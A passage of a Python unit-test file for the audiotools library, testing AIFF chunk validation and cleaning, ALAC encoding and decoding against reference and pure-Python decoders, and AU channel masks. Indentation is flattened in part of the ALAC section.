            temp.write("".join(aiff_data))
            temp.flush()
            aiff = audiotools.open(temp.name)
            self.assertRaises(audiotools.InvalidFile,
                              aiff.verify)
        finally:
            temp.close()
        #test no SSND chunk
        aiff = audiotools.open("aiff-nossnd.aiff")
        self.assertRaises(audiotools.InvalidFile, aiff.verify)
        #test convert errors
        temp = tempfile.NamedTemporaryFile(suffix=".aiff")
        try:
            # truncate the last 10 bytes from a valid fixture
            temp.write(open("aiff-2ch.aiff", "rb").read()[0:-10])
            temp.flush()
            # NOTE(review): local named "flac" is historical copy/paste —
            # it holds an AIFF track
            flac = audiotools.open(temp.name)
            if (os.path.isfile("dummy.wav")):
                os.unlink("dummy.wav")
            self.assertEqual(os.path.isfile("dummy.wav"), False)
            self.assertRaises(audiotools.EncodingError,
                              flac.convert,
                              "dummy.wav",
                              audiotools.WaveAudio)
            self.assertEqual(os.path.isfile("dummy.wav"), False)
        finally:
            temp.close()
        # minimal valid COMM and SSND chunks used to build bad orderings
        COMM = audiotools.aiff.AIFF_Chunk(
            "COMM",
            18,
            '\x00\x01\x00\x00\x00\r\x00\x10@\x0e\xacD\x00\x00\x00\x00\x00\x00')
        SSND = audiotools.aiff.AIFF_Chunk(
            "SSND",
            34,
            '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x02\x00\x03\x00\x02\x00\x01\x00\x00\xff\xff\xff\xfe\xff\xfd\xff\xfe\xff\xff\x00\x00')
        #test multiple COMM chunks found
        #test multiple SSND chunks found
        #test SSND chunk before COMM chunk
        #test no SSND chunk
        #test no COMM chunk
        for chunks in [[COMM, COMM, SSND],
                       [COMM, SSND, SSND],
                       [SSND, COMM],
                       [SSND],
                       [COMM]]:
            temp = tempfile.NamedTemporaryFile(suffix=".aiff")
            try:
                audiotools.AiffAudio.aiff_from_chunks(temp.name, chunks)
                self.assertRaises(
                    audiotools.InvalidFile,
                    audiotools.open(temp.name).verify)
            finally:
                temp.close()

    @FORMAT_AIFF
    def test_clean(self):
        """Verify clean() reorders/deduplicates chunks to [COMM, SSND]."""
        import audiotools.aiff
        # minimal valid COMM and SSND chunks used to build dirty files
        COMM = audiotools.aiff.AIFF_Chunk(
            "COMM",
            18,
            '\x00\x01\x00\x00\x00\r\x00\x10@\x0e\xacD\x00\x00\x00\x00\x00\x00')
        SSND = audiotools.aiff.AIFF_Chunk(
            "SSND",
            34,
            '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x02\x00\x03\x00\x02\x00\x01\x00\x00\xff\xff\xff\xfe\xff\xfd\xff\xfe\xff\xff\x00\x00')
        #test multiple COMM chunks
        #test multiple SSND chunks
        #test data chunk before fmt chunk
        temp = tempfile.NamedTemporaryFile(suffix=".aiff")
        fixed = tempfile.NamedTemporaryFile(suffix=".aiff")
        try:
            for chunks in [[COMM, COMM, SSND],
                           [COMM, SSND, COMM],
                           [COMM, SSND, SSND],
                           [SSND, COMM],
                           [SSND, COMM, COMM]]:
                audiotools.AiffAudio.aiff_from_chunks(temp.name, chunks)
                fixes = []
                aiff = audiotools.open(temp.name).clean(fixes, fixed.name)
                # cleaned file must contain exactly one COMM then one SSND
                chunks = list(aiff.chunks())
                self.assertEquals([c.id for c in chunks],
                                  [c.id for c in [COMM, SSND]])
                self.assertEquals([c.__size__ for c in chunks],
                                  [c.__size__ for c in [COMM, SSND]])
                self.assertEquals([c.__data__ for c in chunks],
                                  [c.__data__ for c in [COMM, SSND]])
        finally:
            temp.close()
            fixed.close()
class ALACFileTest(LosslessFileTest):
def setUp(self):
self.audio_class = audiotools.ALACAudio
self.suffix = "." + self.audio_class.SUFFIX
from audiotools.decoders import ALACDecoder
from audiotools.encoders import encode_alac
self.decoder = ALACDecoder
self.encode = encode_alac
@FORMAT_ALAC
def test_init(self):
#check missing file
self.assertRaises(audiotools.m4a.InvalidALAC,
audiotools.ALACAudio,
"/dev/null/foo")
#check invalid file
invalid_file = tempfile.NamedTemporaryFile(suffix=".m4a")
try:
for c in "invalidstringxxx":
invalid_file.write(c)
invalid_file.flush()
self.assertRaises(audiotools.m4a.InvalidALAC,
audiotools.ALACAudio,
invalid_file.name)
finally:
invalid_file.close()
#check some decoder errors,
#mostly to ensure a failed init doesn't make Python explode
self.assertRaises(TypeError, self.decoder)
self.assertRaises(TypeError, self.decoder, None)
@FORMAT_ALAC
def test_bits_per_sample(self):
temp = tempfile.NamedTemporaryFile(suffix=self.suffix)
try:
for bps in (16, 24):
track = self.audio_class.from_pcm(temp.name, BLANK_PCM_Reader(
1, bits_per_sample=bps))
self.assertEqual(track.bits_per_sample(), bps)
track2 = audiotools.open(temp.name)
self.assertEqual(track2.bits_per_sample(), bps)
finally:
temp.close()
@FORMAT_ALAC
def test_channel_mask(self):
if (self.audio_class is audiotools.AudioFile):
return
temp = tempfile.NamedTemporaryFile(suffix=self.suffix)
try:
for mask in [["front_center"],
["front_left",
"front_right"]]:
cm = audiotools.ChannelMask.from_fields(**dict(
[(f, True) for f in mask]))
track = self.audio_class.from_pcm(temp.name, BLANK_PCM_Reader(
1, channels=len(cm), channel_mask=int(cm)))
self.assertEqual(track.channels(), len(cm))
self.assertEqual(track.channel_mask(), cm)
track = audiotools.open(temp.name)
self.assertEqual(track.channels(), len(cm))
self.assertEqual(track.channel_mask(), cm)
for mask in [["front_center",
"front_left",
"front_right"],
["front_center",
"front_left",
"front_right",
"back_center"],
["front_center",
"front_left",
"front_right",
"back_left",
"back_right"],
["front_center",
"front_left",
"front_right",
"back_left",
"back_right",
"low_frequency"],
["front_center",
"front_left",
"front_right",
"back_left",
"back_right",
"back_center",
"low_frequency"],
["front_center",
"front_left_of_center",
"front_right_of_center",
"front_left",
"front_right",
"back_left",
"back_right",
"low_frequency"]]:
cm = audiotools.ChannelMask.from_fields(**dict(
[(f, True) for f in mask]))
track = self.audio_class.from_pcm(temp.name, BLANK_PCM_Reader(
1, channels=len(cm), channel_mask=int(cm)))
self.assertEqual(track.channels(), len(cm))
self.assertEqual(track.channel_mask(), cm)
track = audiotools.open(temp.name)
self.assertEqual(track.channels(), len(cm))
self.assertEqual(track.channel_mask(), cm)
#ensure valid channel counts with invalid channel masks
#raise an exception
self.assertRaises(audiotools.UnsupportedChannelMask,
self.audio_class.from_pcm,
temp.name,
BLANK_PCM_Reader(1, channels=4,
channel_mask=0x0033))
self.assertRaises(audiotools.UnsupportedChannelMask,
self.audio_class.from_pcm,
temp.name,
BLANK_PCM_Reader(1, channels=5,
channel_mask=0x003B))
finally:
temp.close()
@FORMAT_ALAC
def test_verify(self):
alac_data = open("alac-allframes.m4a", "rb").read()
#test truncating the mdat atom triggers IOError
temp = tempfile.NamedTemporaryFile(suffix='.m4a')
try:
for i in xrange(0x16CD, len(alac_data)):
temp.seek(0, 0)
temp.write(alac_data[0:i])
temp.flush()
self.assertEqual(os.path.getsize(temp.name), i)
decoder = audiotools.open(temp.name).to_pcm()
self.assertNotEqual(decoder, None)
self.assertRaises(IOError,
audiotools.transfer_framelist_data,
decoder, lambda x: x)
self.assertRaises(audiotools.InvalidFile,
audiotools.open(temp.name).verify)
finally:
temp.close()
#test a truncated file's convert() method raises EncodingError
temp = tempfile.NamedTemporaryFile(suffix=".m4a")
try:
temp.write(open("alac-allframes.m4a", "rb").read()[0:-10])
temp.flush()
flac = audiotools.open(temp.name)
if (os.path.isfile("dummy.wav")):
os.unlink("dummy.wav")
self.assertEqual(os.path.isfile("dummy.wav"), False)
self.assertRaises(audiotools.EncodingError,
flac.convert,
"dummy.wav",
audiotools.WaveAudio)
self.assertEqual(os.path.isfile("dummy.wav"), False)
finally:
temp.close()
@FORMAT_ALAC
def test_too(self):
#ensure that the 'too' meta atom isn't modified by setting metadata
temp = tempfile.NamedTemporaryFile(
suffix=self.suffix)
try:
track = self.audio_class.from_pcm(
temp.name,
BLANK_PCM_Reader(1))
metadata = track.get_metadata()
encoder = unicode(metadata['ilst']['\xa9too'])
track.set_metadata(audiotools.MetaData(track_name=u"Foo"))
metadata = track.get_metadata()
self.assertEqual(metadata.track_name, u"Foo")
self.assertEqual(unicode(metadata['ilst']['\xa9too']), encoder)
finally:
temp.close()
def __test_reader__(self, pcmreader, block_size=4096):
    """Encode pcmreader to a temporary ALAC file and verify the result.

    First checks that our built-in decoder reproduces PCM whose MD5 sum
    matches pcmreader's digest(), then checks the same against the
    external alac(1) reference decoder.

    Requires the alac(1) reference binary to be executable; the test
    fails outright if it is missing.
    """
    if (not audiotools.BIN.can_execute(audiotools.BIN["alac"])):
        self.assert_(False,
                     "reference ALAC binary alac(1) required for this test")

    temp_file = tempfile.NamedTemporaryFile(suffix=".alac")
    self.audio_class.from_pcm(temp_file.name,
                              pcmreader,
                              block_size=block_size)

    alac = audiotools.open(temp_file.name)
    self.assert_(alac.total_frames() > 0)

    #first, ensure the ALAC-encoded file
    #has the same MD5 signature as pcmreader once decoded
    md5sum_decoder = md5()
    d = alac.to_pcm()
    f = d.read(audiotools.FRAMELIST_SIZE)
    while (len(f) > 0):
        md5sum_decoder.update(f.to_bytes(False, True))
        f = d.read(audiotools.FRAMELIST_SIZE)
    d.close()
    self.assertEqual(md5sum_decoder.digest(), pcmreader.digest())

    #then compare our .to_pcm() output
    #with that of the ALAC reference decoder
    reference = subprocess.Popen([audiotools.BIN["alac"],
                                  "-r", temp_file.name],
                                 stdout=subprocess.PIPE)
    md5sum_reference = md5()
    audiotools.transfer_data(reference.stdout.read, md5sum_reference.update)
    #a nonzero exit status means the reference decoder rejected the file
    self.assertEqual(reference.wait(), 0)
    self.assertEqual(md5sum_reference.digest(), pcmreader.digest(),
                     "mismatch decoding %s from reference (%s != %s)" %
                     (repr(pcmreader),
                      md5sum_reference.hexdigest(),
                      pcmreader.hexdigest()))
def __test_reader_nonalac__(self, pcmreader, block_size=4096):
    """Encode pcmreader to ALAC and verify with the built-in decoder only.

    Used for multichannel streams, which the reference alac(1) binary
    cannot decode yet; correctness therefore rests solely on our own
    decoder reproducing pcmreader's digest().
    """
    temp_file = tempfile.NamedTemporaryFile(suffix=".alac")
    self.audio_class.from_pcm(temp_file.name,
                              pcmreader,
                              block_size=block_size)

    encoded = audiotools.open(temp_file.name)
    self.assert_(encoded.total_frames() > 0)

    # decoding the ALAC file must yield the same MD5 sum
    # as the original PCM stream
    checksum = md5()
    decoder = encoded.to_pcm()
    framelist = decoder.read(audiotools.FRAMELIST_SIZE)
    while (len(framelist) > 0):
        checksum.update(framelist.to_bytes(False, True))
        framelist = decoder.read(audiotools.FRAMELIST_SIZE)
    decoder.close()
    self.assertEqual(checksum.digest(), pcmreader.digest())
def __stream_variations__(self):
    """Yield mono and stereo sine-based test streams.

    Covers 16 and 24 bits-per-sample at several sample rates, tone
    frequencies, amplitudes and (for stereo) channel ratios.
    """
    for stream in [
        test_streams.Sine16_Mono(200000, 48000, 441.0, 0.50, 441.0, 0.49),
        test_streams.Sine16_Mono(200000, 96000, 441.0, 0.61, 661.5, 0.37),
        test_streams.Sine16_Mono(200000, 44100, 441.0, 0.50, 882.0, 0.49),
        test_streams.Sine16_Mono(200000, 44100, 441.0, 0.50, 4410.0, 0.49),
        test_streams.Sine16_Mono(200000, 44100, 8820.0, 0.70, 4410.0, 0.29),
        test_streams.Sine16_Stereo(200000, 48000, 441.0, 0.50, 441.0, 0.49, 1.0),
        test_streams.Sine16_Stereo(200000, 48000, 441.0, 0.61, 661.5, 0.37, 1.0),
        test_streams.Sine16_Stereo(200000, 96000, 441.0, 0.50, 882.0, 0.49, 1.0),
        test_streams.Sine16_Stereo(200000, 44100, 441.0, 0.50, 4410.0, 0.49, 1.0),
        test_streams.Sine16_Stereo(200000, 44100, 8820.0, 0.70, 4410.0, 0.29, 1.0),
        test_streams.Sine16_Stereo(200000, 44100, 441.0, 0.50, 441.0, 0.49, 0.5),
        test_streams.Sine16_Stereo(200000, 44100, 441.0, 0.61, 661.5, 0.37, 2.0),
        test_streams.Sine16_Stereo(200000, 44100, 441.0, 0.50, 882.0, 0.49, 0.7),
        test_streams.Sine16_Stereo(200000, 44100, 441.0, 0.50, 4410.0, 0.49, 1.3),
        test_streams.Sine16_Stereo(200000, 44100, 8820.0, 0.70, 4410.0, 0.29, 0.1),
        test_streams.Sine24_Mono(200000, 48000, 441.0, 0.50, 441.0, 0.49),
        test_streams.Sine24_Mono(200000, 96000, 441.0, 0.61, 661.5, 0.37),
        test_streams.Sine24_Mono(200000, 44100, 441.0, 0.50, 882.0, 0.49),
        test_streams.Sine24_Mono(200000, 44100, 441.0, 0.50, 4410.0, 0.49),
        test_streams.Sine24_Mono(200000, 44100, 8820.0, 0.70, 4410.0, 0.29),
        test_streams.Sine24_Stereo(200000, 48000, 441.0, 0.50, 441.0, 0.49, 1.0),
        test_streams.Sine24_Stereo(200000, 48000, 441.0, 0.61, 661.5, 0.37, 1.0),
        test_streams.Sine24_Stereo(200000, 96000, 441.0, 0.50, 882.0, 0.49, 1.0),
        test_streams.Sine24_Stereo(200000, 44100, 441.0, 0.50, 4410.0, 0.49, 1.0),
        test_streams.Sine24_Stereo(200000, 44100, 8820.0, 0.70, 4410.0, 0.29, 1.0),
        test_streams.Sine24_Stereo(200000, 44100, 441.0, 0.50, 441.0, 0.49, 0.5),
        test_streams.Sine24_Stereo(200000, 44100, 441.0, 0.61, 661.5, 0.37, 2.0),
        test_streams.Sine24_Stereo(200000, 44100, 441.0, 0.50, 882.0, 0.49, 0.7),
        test_streams.Sine24_Stereo(200000, 44100, 441.0, 0.50, 4410.0, 0.49, 1.3),
        test_streams.Sine24_Stereo(200000, 44100, 8820.0, 0.70, 4410.0, 0.29, 0.1)]:
        yield stream
def __multichannel_stream_variations__(self):
    """Yield multichannel (3 to 8 channel) sine-based test streams.

    Covers 16 and 24 bits-per-sample across several channel-mask
    layouts; each (amplitude, frequency) tuple describes one channel.
    """
    for stream in [
        test_streams.Simple_Sine(200000, 44100, 0x0007, 16,
                                 (6400, 10000),
                                 (12800, 20000),
                                 (30720, 30000)),
        test_streams.Simple_Sine(200000, 44100, 0x0107, 16,
                                 (6400, 10000),
                                 (12800, 20000),
                                 (19200, 30000),
                                 (16640, 40000)),
        test_streams.Simple_Sine(200000, 44100, 0x0037, 16,
                                 (6400, 10000),
                                 (8960, 15000),
                                 (11520, 20000),
                                 (12800, 25000),
                                 (14080, 30000)),
        test_streams.Simple_Sine(200000, 44100, 0x003F, 16,
                                 (6400, 10000),
                                 (11520, 15000),
                                 (16640, 20000),
                                 (21760, 25000),
                                 (26880, 30000),
                                 (30720, 35000)),
        test_streams.Simple_Sine(200000, 44100, 0x013F, 16,
                                 (6400, 10000),
                                 (11520, 15000),
                                 (16640, 20000),
                                 (21760, 25000),
                                 (26880, 30000),
                                 (30720, 35000),
                                 (29000, 40000)),
        test_streams.Simple_Sine(200000, 44100, 0x00FF, 16,
                                 (6400, 10000),
                                 (11520, 15000),
                                 (16640, 20000),
                                 (21760, 25000),
                                 (26880, 30000),
                                 (30720, 35000),
                                 (29000, 40000),
                                 (28000, 45000)),
        test_streams.Simple_Sine(200000, 44100, 0x0007, 24,
                                 (1638400, 10000),
                                 (3276800, 20000),
                                 (7864320, 30000)),
        test_streams.Simple_Sine(200000, 44100, 0x0107, 24,
                                 (1638400, 10000),
                                 (3276800, 20000),
                                 (4915200, 30000),
                                 (4259840, 40000)),
        test_streams.Simple_Sine(200000, 44100, 0x0037, 24,
                                 (1638400, 10000),
                                 (2293760, 15000),
                                 (2949120, 20000),
                                 (3276800, 25000),
                                 (3604480, 30000)),
        test_streams.Simple_Sine(200000, 44100, 0x003F, 24,
                                 (1638400, 10000),
                                 (2949120, 15000),
                                 (4259840, 20000),
                                 (5570560, 25000),
                                 (6881280, 30000),
                                 (7864320, 35000)),
        test_streams.Simple_Sine(200000, 44100, 0x013F, 24,
                                 (1638400, 10000),
                                 (2949120, 15000),
                                 (4259840, 20000),
                                 (5570560, 25000),
                                 (6881280, 30000),
                                 (7864320, 35000),
                                 (7000000, 40000)),
        test_streams.Simple_Sine(200000, 44100, 0x00FF, 24,
                                 (1638400, 10000),
                                 (2949120, 15000),
                                 (4259840, 20000),
                                 (5570560, 25000),
                                 (6881280, 30000),
                                 (7864320, 35000),
                                 (7000000, 40000),
                                 (6000000, 45000))]:
        yield stream
@FORMAT_ALAC
def test_streams(self):
    """Sanity-check the test stream generators themselves.

    Reading each stream to exhaustion must produce PCM data whose
    MD5 sum equals the stream's own digest() value.  The original
    code duplicated the same verification loop for the stereo/mono
    and multichannel variations; it is factored into one helper here.
    """
    def verify_stream(stream):
        # hash the stream's PCM output to exhaustion
        checksum = md5()
        framelist = stream.read(audiotools.FRAMELIST_SIZE)
        while (len(framelist) > 0):
            checksum.update(framelist.to_bytes(False, True))
            framelist = stream.read(audiotools.FRAMELIST_SIZE)
        self.assertEqual(checksum.digest(), stream.digest())
        stream.close()

    for stream in self.__stream_variations__():
        verify_stream(stream)
    for stream in self.__multichannel_stream_variations__():
        verify_stream(stream)
@FORMAT_ALAC
def test_small_files(self):
    """Round-trip the tiny generated test streams through the encoder."""
    generators = (test_streams.Generate01,
                  test_streams.Generate02,
                  test_streams.Generate03,
                  test_streams.Generate04)
    for generator in generators:
        self.__test_reader__(generator(44100), block_size=1152)
@FORMAT_ALAC
def test_full_scale_deflection(self):
    """Round-trip full-scale-deflection patterns at 16 and 24 bps."""
    patterns = (test_streams.PATTERN01,
                test_streams.PATTERN02,
                test_streams.PATTERN03,
                test_streams.PATTERN04,
                test_streams.PATTERN05,
                test_streams.PATTERN06,
                test_streams.PATTERN07)
    # fsd16 builds 16-bit streams, fsd24 24-bit ones
    for fsd in (test_streams.fsd16, test_streams.fsd24):
        for pattern in patterns:
            self.__test_reader__(
                test_streams.MD5Reader(fsd(pattern, 100)),
                block_size=1152)
@FORMAT_ALAC
def test_sines(self):
    """Round-trip every sine-based test stream."""
    # stereo/mono variations are checked against the reference decoder
    for stream in self.__stream_variations__():
        self.__test_reader__(stream, block_size=1152)
    # multichannel variations use only the built-in decoder
    for stream in self.__multichannel_stream_variations__():
        self.__test_reader_nonalac__(stream, block_size=1152)
@FORMAT_ALAC
def test_wasted_bps(self):
    """Round-trip a stream containing wasted bits-per-sample."""
    stream = test_streams.WastedBPS16(1000)
    self.__test_reader__(stream, block_size=1152)
@FORMAT_ALAC
def test_blocksizes(self):
    """Round-trip a short noise burst at every block size from 16 to 33."""
    noise = struct.unpack(">32h", os.urandom(64))
    for block_size in xrange(16, 34):
        self.__test_reader__(
            test_streams.MD5Reader(
                test_streams.FrameListReader(noise, 44100, 1, 16)),
            block_size=block_size)
@FORMAT_ALAC
def test_noise(self):
    """Round-trip random noise over channel counts, depths and block sizes."""
    for (channels, mask) in [
            (1, audiotools.ChannelMask.from_channels(1)),
            (2, audiotools.ChannelMask.from_channels(2))]:
        for bps in (16, 24):
            # the reference decoder can't handle very large block sizes
            for blocksize in (32, 4096, 8192):
                reader = MD5_Reader(
                    EXACT_RANDOM_PCM_Reader(pcm_frames=65536,
                                            sample_rate=44100,
                                            channels=channels,
                                            channel_mask=mask,
                                            bits_per_sample=bps))
                self.__test_reader__(reader, block_size=blocksize)
@FORMAT_ALAC
def test_fractional(self):
    """Test block sizes that don't evenly divide the stream length."""
    # (block_size, list of stream lengths in PCM frames)
    cases = [
        (33, [31, 32, 33, 34, 35, 2046, 2047, 2048, 2049, 2050]),
        (256, [254, 255, 256, 257, 258, 510, 511, 512,
               513, 514, 1022, 1023, 1024, 1025, 1026,
               2046, 2047, 2048, 2049, 2050, 4094, 4095,
               4096, 4097, 4098]),
        (2048, [1022, 1023, 1024, 1025, 1026, 2046, 2047,
                2048, 2049, 2050, 4094, 4095, 4096, 4097, 4098]),
        (4608, [1022, 1023, 1024, 1025, 1026, 2046, 2047, 2048,
                2049, 2050, 4094, 4095, 4096, 4097, 4098, 4606,
                4607, 4608, 4609, 4610, 8190, 8191, 8192, 8193,
                8194, 16382, 16383, 16384, 16385, 16386])]
    for (block_size, frame_counts) in cases:
        for pcm_frames in frame_counts:
            self.__test_reader__(
                MD5_Reader(EXACT_RANDOM_PCM_Reader(
                    pcm_frames=pcm_frames,
                    sample_rate=44100,
                    channels=2,
                    bits_per_sample=16)),
                block_size=block_size)
@FORMAT_ALAC
def test_frame_header_variations(self):
    """Exercise unusual block sizes and sample rates in frame headers."""
    # a very small block size
    self.__test_reader__(test_streams.Sine16_Mono(200000, 96000,
                                                  441.0, 0.61, 661.5, 0.37),
                         block_size=16)

    # The alac(1) decoder used as a reference can't handle a 65535
    # block size even though iTunes accepts the resulting files, so
    # that case remains disabled here — likely an alac(1) bug.
    # Nobody is expected to use a non-default block size anyway.
    # self.__test_reader__(test_streams.Sine16_Mono(200000, 96000,
    #                                               441.0, 0.61, 661.5, 0.37),
    #                      block_size=65535)

    # unusual sample rates at a typical block size
    for sample_rate in (9, 90, 90000):
        self.__test_reader__(
            test_streams.Sine16_Mono(200000, sample_rate,
                                     441.0, 0.61, 661.5, 0.37),
            block_size=1152)
@FORMAT_ALAC
def test_python_codec(self):
    """Verify the pure-Python ALAC encoder and decoder.

    Encodes each test stream with the Python-based encoder, then
    checks that the Python-based and C-based decoders produce
    identical PCM from the resulting file.  Mirrors the coverage of
    the C-codec tests (small files, full-scale deflection, sines,
    multichannel, wasted BPS, block sizes, noise, fractional
    blocks, frame header variations) but with shorter streams since
    the Python codec is slow.
    """
    def test_python_reader(pcmreader, block_size=4096):
        #ALAC doesn't really have encoding options worth mentioning
        from audiotools.py_encoders import encode_mdat

        #encode file using Python-based encoder
        temp_file = tempfile.NamedTemporaryFile(suffix=".m4a")
        audiotools.ALACAudio.from_pcm(
            temp_file.name,
            pcmreader,
            block_size=block_size,
            encoding_function=encode_mdat)

        #verify contents of file decoded by
        #Python-based decoder against contents decoded by
        #C-based decoder
        from audiotools.py_decoders import ALACDecoder as ALACDecoder1
        from audiotools.decoders import ALACDecoder as ALACDecoder2
        self.assertEqual(audiotools.pcm_frame_cmp(
            ALACDecoder1(temp_file.name),
            ALACDecoder2(temp_file.name)), None)

        temp_file.close()

    #test small files
    for g in [test_streams.Generate01,
              test_streams.Generate02,
              test_streams.Generate03,
              test_streams.Generate04]:
        test_python_reader(g(44100), block_size=1152)

    #test full scale deflection
    for (bps, fsd) in [(16, test_streams.fsd16),
                       (24, test_streams.fsd24)]:
        for pattern in [test_streams.PATTERN01,
                        test_streams.PATTERN02,
                        test_streams.PATTERN03,
                        test_streams.PATTERN04,
                        test_streams.PATTERN05,
                        test_streams.PATTERN06,
                        test_streams.PATTERN07]:
            test_python_reader(fsd(pattern, 100), block_size=1152)

    #test sines
    for g in [test_streams.Sine16_Mono(5000, 48000,
                                       441.0, 0.50, 441.0, 0.49),
              test_streams.Sine16_Mono(5000, 96000,
                                       441.0, 0.61, 661.5, 0.37),
              test_streams.Sine16_Stereo(5000, 48000,
                                         441.0, 0.50, 441.0, 0.49, 1.0),
              test_streams.Sine16_Stereo(5000, 96000,
                                         441.0, 0.50, 882.0, 0.49, 1.0),
              test_streams.Sine24_Mono(5000, 48000,
                                       441.0, 0.50, 441.0, 0.49),
              test_streams.Sine24_Mono(5000, 96000,
                                       441.0, 0.61, 661.5, 0.37),
              test_streams.Sine24_Stereo(5000, 48000,
                                         441.0, 0.50, 441.0, 0.49, 1.0),
              test_streams.Sine24_Stereo(5000, 96000,
                                         441.0, 0.50, 882.0, 0.49, 1.0)]:
        test_python_reader(g, block_size=1152)

    #test multichannel streams across channel masks and bit depths
    for g in [test_streams.Simple_Sine(5000, 44100, 0x0007, 16,
                                       (6400, 10000),
                                       (12800, 20000),
                                       (30720, 30000)),
              test_streams.Simple_Sine(5000, 44100, 0x0107, 16,
                                       (6400, 10000),
                                       (12800, 20000),
                                       (19200, 30000),
                                       (16640, 40000)),
              test_streams.Simple_Sine(5000, 44100, 0x0037, 16,
                                       (6400, 10000),
                                       (8960, 15000),
                                       (11520, 20000),
                                       (12800, 25000),
                                       (14080, 30000)),
              test_streams.Simple_Sine(5000, 44100, 0x003F, 16,
                                       (6400, 10000),
                                       (11520, 15000),
                                       (16640, 20000),
                                       (21760, 25000),
                                       (26880, 30000),
                                       (30720, 35000)),
              test_streams.Simple_Sine(5000, 44100, 0x013F, 16,
                                       (6400, 10000),
                                       (11520, 15000),
                                       (16640, 20000),
                                       (21760, 25000),
                                       (26880, 30000),
                                       (30720, 35000),
                                       (29000, 40000)),
              test_streams.Simple_Sine(5000, 44100, 0x00FF, 16,
                                       (6400, 10000),
                                       (11520, 15000),
                                       (16640, 20000),
                                       (21760, 25000),
                                       (26880, 30000),
                                       (30720, 35000),
                                       (29000, 40000),
                                       (28000, 45000)),
              test_streams.Simple_Sine(5000, 44100, 0x0007, 24,
                                       (1638400, 10000),
                                       (3276800, 20000),
                                       (7864320, 30000)),
              test_streams.Simple_Sine(5000, 44100, 0x0107, 24,
                                       (1638400, 10000),
                                       (3276800, 20000),
                                       (4915200, 30000),
                                       (4259840, 40000)),
              test_streams.Simple_Sine(5000, 44100, 0x0037, 24,
                                       (1638400, 10000),
                                       (2293760, 15000),
                                       (2949120, 20000),
                                       (3276800, 25000),
                                       (3604480, 30000)),
              test_streams.Simple_Sine(5000, 44100, 0x003F, 24,
                                       (1638400, 10000),
                                       (2949120, 15000),
                                       (4259840, 20000),
                                       (5570560, 25000),
                                       (6881280, 30000),
                                       (7864320, 35000)),
              test_streams.Simple_Sine(5000, 44100, 0x013F, 24,
                                       (1638400, 10000),
                                       (2949120, 15000),
                                       (4259840, 20000),
                                       (5570560, 25000),
                                       (6881280, 30000),
                                       (7864320, 35000),
                                       (7000000, 40000)),
              test_streams.Simple_Sine(5000, 44100, 0x00FF, 24,
                                       (1638400, 10000),
                                       (2949120, 15000),
                                       (4259840, 20000),
                                       (5570560, 25000),
                                       (6881280, 30000),
                                       (7864320, 35000),
                                       (7000000, 40000),
                                       (6000000, 45000))]:
        test_python_reader(g, block_size=1152)

    #test wasted BPS
    test_python_reader(test_streams.WastedBPS16(1000),
                       block_size=1152)

    #test block sizes
    noise = struct.unpack(">32h", os.urandom(64))
    for block_size in [16, 17, 18, 19, 20, 21, 22, 23, 24,
                       25, 26, 27, 28, 29, 30, 31, 32, 33]:
        test_python_reader(test_streams.MD5Reader(
            test_streams.FrameListReader(noise,
                                         44100, 1, 16)),
            block_size=block_size)

    #test noise
    for (channels, mask) in [
        (1, audiotools.ChannelMask.from_channels(1)),
        (2, audiotools.ChannelMask.from_channels(2))]:
        for bps in [16, 24]:
            #the reference decoder can't handle very large block sizes
            for blocksize in [32, 4096, 8192]:
                test_python_reader(
                    EXACT_RANDOM_PCM_Reader(
                        pcm_frames=4097,
                        sample_rate=44100,
                        channels=channels,
                        channel_mask=mask,
                        bits_per_sample=bps),
                    block_size=blocksize)

    #test fractional
    for (block_size,
         pcm_frames) in [(33, [31, 32, 33, 34, 35, 2046,
                               2047, 2048, 2049, 2050]),
                         (256, [254, 255, 256, 257, 258, 510, 511, 512,
                                513, 514, 1022, 1023, 1024, 1025, 1026,
                                2046, 2047, 2048, 2049, 2050, 4094, 4095,
                                4096, 4097, 4098])]:
        for frame_count in pcm_frames:
            test_python_reader(EXACT_RANDOM_PCM_Reader(
                pcm_frames=frame_count,
                sample_rate=44100,
                channels=2,
                bits_per_sample=16),
                block_size=block_size)

    #test frame header variations
    test_python_reader(
        test_streams.Sine16_Mono(5000, 96000,
                                 441.0, 0.61, 661.5, 0.37),
        block_size=16)
    test_python_reader(
        test_streams.Sine16_Mono(5000, 9,
                                 441.0, 0.61, 661.5, 0.37),
        block_size=1152)
    test_python_reader(
        test_streams.Sine16_Mono(5000, 90,
                                 441.0, 0.61, 661.5, 0.37),
        block_size=1152)
    test_python_reader(
        test_streams.Sine16_Mono(5000, 90000,
                                 441.0, 0.61, 661.5, 0.37),
        block_size=1152)
class AUFileTest(LosslessFileTest):
    """Tests for Sun AU (.au) file support."""

    def setUp(self):
        self.audio_class = audiotools.AuAudio
        self.suffix = "." + self.audio_class.SUFFIX

    @FORMAT_AU
    def test_channel_mask(self):
        """Mono and stereo masks round-trip; larger masks collapse to 0."""
        if (self.audio_class is audiotools.AudioFile):
            return

        temp = tempfile.NamedTemporaryFile(suffix=self.suffix)
        try:
            #mono and stereo masks survive a round-trip intact
            for mask in [["front_center"],
                         ["front_left",
                          "front_right"]]:
                cm = audiotools.ChannelMask.from_fields(**dict(
                    [(f, True) for f in mask]))
                track = self.audio_class.from_pcm(temp.name, BLANK_PCM_Reader(
                    1, channels=len(cm), channel_mask=int(cm)))
                self.assertEqual(track.channels(), len(cm))
                self.assertEqual(track.channel_mask(), cm)
                track = audiotools.open(temp.name)
                self.assertEqual(track.channels(), len(cm))
                self.assertEqual(track.channel_mask(), cm)

            #masks with more than two channels come back as 0
            #(the AU format carries no channel-assignment information)
            for mask in [["front_left",
                          "front_right",
                          "front_center"],
                         ["front_left",
                          "front_right",
                          "back_left",
                          "back_right"],
                         ["front_left",
                          "front_right",
                          "front_center",
                          "back_left",
                          "back_right"],
                         ["front_left",
                          "front_right",
                          "front_center",
                          "low_frequency",
                          "back_left",
                          "back_right"]]:
                cm = audiotools.ChannelMask.from_fields(**dict(
                    [(f, True) for f in mask]))
                track = self.audio_class.from_pcm(temp.name, BLANK_PCM_Reader(
                    1, channels=len(cm), channel_mask=int(cm)))
                self.assertEqual(track.channels(), len(cm))
                self.assertEqual(track.channel_mask(), 0)
                track = audiotools.open(temp.name)
                self.assertEqual(track.channels(), len(cm))
                self.assertEqual(track.channel_mask(), 0)
        finally:
            temp.close()

    @FORMAT_AU
    def test_verify(self):
        """Truncated AU files raise IOError on read, EncodingError on convert."""
        #test truncated file
        temp = tempfile.NamedTemporaryFile(
            suffix="." + self.audio_class.SUFFIX)
